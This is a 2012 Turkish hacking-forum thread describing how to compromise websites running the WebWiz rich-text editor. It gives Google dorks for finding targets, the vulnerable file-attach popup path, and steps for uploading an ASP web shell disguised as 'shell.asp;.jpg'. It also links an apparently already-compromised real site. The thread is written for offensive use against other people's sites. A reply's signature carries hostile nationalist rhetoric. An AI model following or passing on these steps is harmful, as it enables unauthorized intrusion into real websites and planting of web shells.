İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Webwiz RTE Açığı

15-06-2012 19:51
#1
Ymz Krtprk - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2012
Nereden:
Bruksel
Mesajlar:
134
Teşekkür (Etti):
11
Teşekkür (Aldı):
7
Konular:
65
Ticaret:
(0) %
Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/

Exploit: site.com/rte/RTE_popup_file_atch.asp

Örnek:
Siteleri arattık rte uzantısı şu şekil çıktı; Hacked_bY_iLLuminate_d3moN şimdi sitenin sonuna upload linkini yapıştırıcaz;

Attach File Properties

açılan sitede jpg shell imizi upload ediyoruz shell.asp;.jpg sonra upload linkimizin olduğu yere gidiyoruz. o dizinde /my_********s/my_files/ burası oluyor.

http://www.jrf.org.tw/newjrf/rte/my_...677_x.asp;.jpg

27-06-2012 17:26
#2
scoobydoo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
Yer Altı Teknolejilerinin İçinde Trojan Mahalesinin Yanındaki Hack Sokağının Oradaki Sızıntıda
Mesajlar:
622
Teşekkür (Etti):
21
Teşekkür (Aldı):
66
Konular:
130
Ticaret:
(0) %
Saol kardeş
Kullanıcı İmzası

Ey İnsan Oğlu Biz Türküz Bir Varızdır Yarın Yokuzdur
Bizim Yokluğumuzu Fırsat Bilip Yok Olursunuz
Biz Hayata İken Kardes Kanı Akıtıp Terör İçin Mücadele Etseniz Bile
Bu Hayatı Size Dar Edeceğiz ...
EY Ulan Duy Bu Sözümü İt Pkklılar
Gidişim Suskun Oldu Dönüşüm Böyle Olmayacak

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı